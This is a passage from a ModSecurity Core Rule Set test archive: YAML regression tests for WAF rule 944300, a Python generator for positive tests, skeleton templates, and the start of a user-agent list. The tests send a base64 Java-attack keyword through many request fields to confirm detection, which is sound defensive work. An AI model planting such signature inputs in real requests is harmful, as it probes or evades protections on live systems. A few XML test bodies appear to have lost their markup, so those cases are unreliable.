              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "B3aGlsZWNsb3N1cmU=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-321
    desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=B3aGlsZWNsb3N1cmU
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-322
    desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: B3aGlsZWNsb3N1cmU=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-323
    desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: B3aGlsZWNsb3N1cmU
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): the body below has no keyword; see the XML note at the top.
  - test_title: 944300-324
    desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-325
    desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "B3aGlsZWNsb3N1cmU"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-326
    desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "B3aGlsZWNsb3N1cmU"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-327
    desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=B3aGlsZWNsb3N1cmU"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-328
    desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}"
          output:
            log_contains: "id \"944300\""
  # Test 944300-329 runs past the end of this span; it is left exactly as found.
- test_title: 944300-329 desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" output: log_contains: "id
\"944300\"" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/base_positive_rules.py���������������������������������0000775�0000000�0000000�00000010424�14461225151�0025767�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python #@spartantri 2018 import sys import argparse import base64 parser = argparse.ArgumentParser() UserAgent="ModSecurity CRS 3 Tests" Accept="text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" AcceptCharset="ISO-8859-1,utf-8;q=0.7,*;q=0.7" AcceptEncoding="gzip,deflate" AcceptLanguage="en-us,en;q=0.5" ContentType="application/x-www-form-urlencoded" payloads=[] skeletontest=0 Meta='''--- meta: author: "spartantri" enabled: true name: "skeletonid.yaml" description: "Positive tests for rule skeletonid" tests: ''' parser.add_argument('-a', action='store', dest='Addr', help='Target ip address', default='127.0.0.1') parser.add_argument('-p', action='store', dest='Port', help='Target port', default='80') parser.add_argument('-v', action='store', dest='Host', help='Target virtual host', default='localhost') parser.add_argument('-s', action='store', dest='skeleton', help='Skeleton file', default='positivetest.yaml.skeleton') parser.add_argument('-o', action='store', dest='output', help='output file', default='') parser.add_argument('-r', action='store', dest='ruleid', help='Rule id', default='944310') 
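# Remaining command-line options. Keywords are supplied either as one
# pipe-separated string (-k) or as repeated individual values (-i); -c and -e
# wrap every keyword with a common prefix / suffix.
parser.add_argument('-k', action='store', dest='combined_payload', help='Keyword containing combined pipe separated payloads', default='')
parser.add_argument('-i', action='append', dest='list_payload', help='Keyword containing individual payload', default=[])
parser.add_argument('-c', action='store', dest='prefix', help='Prefix keyword for all payloads', default='')
parser.add_argument('-e', action='store', dest='sufix', help='Sufix keyword for all payloads', default='')
parser.add_argument('-b', action='store_true', dest='base64encode', help='Encode payload using Base64', default=False)
parser.add_argument('-d', action='store_true', dest='demo', help='Print demo rules if no data is provided', default=False)
# NOTE(review): start_options.test is not read anywhere in the visible part of
# this script, so -t appears to have no effect here -- confirm.
parser.add_argument('-t', action='store_true', dest='test', help='Launch FTW and test output', default=False)
parser.add_argument('-w', action='store', dest='author', help='Test author', default='spartantri')
start_options = parser.parse_args()

# With no arguments at all (and no -d) there is nothing to generate.
if len(sys.argv) < 2 and not start_options.demo:
    parser.print_usage()
    # sys.exit() rather than the bare exit() helper, which is only installed by
    # the site module and is not guaranteed to exist.
    sys.exit()

# Expand the pipe-separated keyword list, skipping empty fields.
# NOTE(review): the membership test compares the bare keyword against entries
# that already carry prefix/suffix, so duplicates are only dropped when both
# are empty -- confirm whether that is intended.
for p in start_options.combined_payload.split('|'):
    if p and p not in payloads:
        payloads.append(''.join([start_options.prefix, p, start_options.sufix]))

# Individually supplied keywords are always appended (no de-duplication).
for p in start_options.list_payload:
    payloads.append(''.join([start_options.prefix, p, start_options.sufix]))

# Write to stdout unless an output file was requested.
if start_options.output == '':
    o = sys.stdout
else:
    o = open(start_options.output, 'w')

# File header: the Meta template with the rule id and author filled in.
o.write(Meta.replace('skeletonid', start_options.ruleid).replace('spartantri', start_options.author))

# Emit one copy of the skeleton file per keyword.
for item in payloads:
    if start_options.base64encode:
        # base64.encodestring() was removed in Python 3.9 and never accepted
        # text on Python 3. b64encode() yields the same characters without the
        # line breaks the old call inserted (which were stripped afterwards).
        raw = item if isinstance(item, bytes) else item.encode('utf-8')
        encoded = base64.b64encode(raw)
        payload = encoded if isinstance(encoded, str) else encoded.decode('ascii')
    else:
        payload = item
    # The keyword is substituted verbatim. The skeletons place it inside
    # double-quoted YAML scalars and in unquoted header values, so a keyword
    # containing '"', '\', '#' or ': ' can yield a test file that does not
    # parse as intended. Base64 output (-b) is not affected.
    with open(start_options.skeleton, 'r') as f:
        for l in f:
            # Placeholder substitution; the remaining placeholders and the
            # write of each line follow this block in the script.
            l = l.replace('skeletonid', start_options.ruleid)
            l = l.replace('skeletonkeyword', payload)
            l = l.replace('skeletondefaultaddr', start_options.Addr)
            l = l.replace('skeletondefaultport', start_options.Port)
            l = l.replace('skeletondefaulthost', start_options.Host)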
l=l.replace('skeletondefaultuseragent', UserAgent) l=l.replace('skeletondefaultacceptcharset', AcceptCharset) l=l.replace('skeletondefaultacceptencoding', AcceptEncoding) l=l.replace('skeletondefaultacceptlanguage', AcceptLanguage) l=l.replace('skeletondefaultcontenttype', ContentType) l=l.replace('skeletondefaultaccept', Accept) if 'skeletontest' in l: l=l.replace('skeletontest', str(skeletontest)) skeletontest+=1 o.write(l) if start_options.output != '': print ('Generated %s rules to file %s' % (str(skeletontest), start_options.output)) o.close() #print('\nGenerated %s tests' % (str(skeletontest))) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/positivetest-light.yaml.skeleton�����������������������0000664�0000000�0000000�00000023106�14461225151�0027723�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ - test_title: skeletonid-skeletontest desc: "Argument test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Argument 
name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword=test" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Cookie test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" Cookie: test=skeletonkeyword method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Cookie name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" Cookie: skeletonkeyword=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Request header test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: 
"skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" test: skeletonkeyword method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML attribute value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML element value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Nested XML element value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword" 
output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"skeletonkeyword\"}" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"skeletonkeyword\": \"test\"}" output: log_contains: "id \"skeletonid\"" 
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/positivetest.yaml.skeleton�����������������������������0000664�0000000�0000000�00000037605�14461225151�0026627�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ - test_title: skeletonid-skeletontest desc: "Argument test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Argument name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: 
"skeletondefaultcontenttype" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword=test" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Cookie test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" Cookie: test=skeletonkeyword method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Cookie name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" Cookie: skeletonkeyword=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Request header test includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" test: skeletonkeyword method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML element includes keyword 
skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML attribute name includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML attribute value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "XML element value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" 
Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Nested XML element value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=skeletonkeyword" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - stage: input: dest_addr: "skeletondefaultaddr" port: skeletondefaultport headers: Host: "skeletondefaulthost" User-Agent: "skeletondefaultuseragent" Accept: "skeletondefaultaccept" Accept-Charset: "skeletondefaultacceptcharset" Accept-Encoding: "skeletondefaultacceptencoding" Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"skeletonkeyword\"}" output: log_contains: "id \"skeletonid\"" - test_title: skeletonid-skeletontest desc: "Content-Type 
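application/json arg name includes keyword skeletonkeyword"
    stages:
      - stage:
          input:
            dest_addr: "skeletondefaultaddr"
            port: skeletondefaultport
            headers:
              Host: "skeletondefaulthost"
              User-Agent: "skeletondefaultuseragent"
              Accept: "skeletondefaultaccept"
              Accept-Charset: "skeletondefaultacceptcharset"
              Accept-Encoding: "skeletondefaultacceptencoding"
              Accept-Language: "skeletondefaultacceptlanguage"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"skeletonkeyword\": \"test\"}"
          output:
            log_contains: "id \"skeletonid\""
  # multipart/form-data part declared as JSON, keyword in the member NAME.
  - test_title: skeletonid-skeletontest
    desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword"
    stages:
      - stage:
          input:
            dest_addr: "skeletondefaultaddr"
            port: skeletondefaultport
            headers:
              Host: "skeletondefaulthost"
              User-Agent: "skeletondefaultuseragent"
              Accept: "skeletondefaultaccept"
              Accept-Charset: "skeletondefaultacceptcharset"
              Accept-Encoding: "skeletondefaultacceptencoding"
              Accept-Language: "skeletondefaultacceptlanguage"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--"
          output:
            log_contains: "id \"skeletonid\""
  # multipart/form-data part declared as JSON, keyword in the member VALUE.
  # This entry previously sent the same body as the "arg name" case above, so
  # the value position was never exercised in the multipart variant; the body
  # now mirrors the plain application/json "arg value" test of this skeleton.
  - test_title: skeletonid-skeletontest
    desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword"
    stages:
      - stage:
          input:
            dest_addr: "skeletondefaultaddr"
            port: skeletondefaultport
            headers:
              Host: "skeletondefaulthost"
              User-Agent: "skeletondefaultuseragent"
              Accept: "skeletondefaultaccept"
              Accept-Charset: "skeletondefaultacceptcharset"
              Accept-Encoding: "skeletondefaultacceptencoding"
              Accept-Language: "skeletondefaultacceptlanguage"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"test\": \"skeletonkeyword\"}\n-----------------------------thisissparta--"
          output:
            log_contains: "id \"skeletonid\""
  # multipart/form-data part declared as XML.
  # NOTE(review): this entry and the next are identical as shown, and the XML
  # part body carries no markup -- presumably the element tags were lost;
  # compare with the upstream skeleton before relying on these two cases.
  - test_title: skeletonid-skeletontest
    desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword"
    stages:
      - stage:
          input:
            dest_addr: "skeletondefaultaddr"
            port: skeletondefaultport
            headers:
              Host: "skeletondefaulthost"
              User-Agent: "skeletondefaultuseragent"
              Accept: "skeletondefaultaccept"
              Accept-Charset: "skeletondefaultacceptcharset"
              Accept-Encoding: "skeletondefaultacceptencoding"
              Accept-Language: "skeletondefaultacceptlanguage"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--"
          output:
            log_contains: "id \"skeletonid\""
  - test_title: skeletonid-skeletontest
    desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword"
    stages:
      - stage:
          input:
            dest_addr: "skeletondefaultaddr"
            port: skeletondefaultport
            headers:
              Host: "skeletondefaulthost"
              User-Agent: "skeletondefaultuseragent"
              Accept: "skeletondefaultaccept"
              Accept-Charset: "skeletondefaultacceptcharset"
              Accept-Encoding: "skeletondefaultacceptencoding"
              Accept-Language: "skeletondefaultacceptlanguage"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--"
          output:
            log_contains: "id \"skeletonid\""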
���������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/utils/�������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021341�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/utils/data/��������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0022252�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/utils/data/popularUAs.data�����������������������������������0000664�0000000�0000000�00000154011�14461225151�0025202�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������AdsBot-Google ( http://www.google.com/adsbot.html) Avant Browser/1.2.789rel1 (http://www.avantbrowser.com) Baiduspider ( http://www.baidu.com/search/spider.htm) BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103 BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 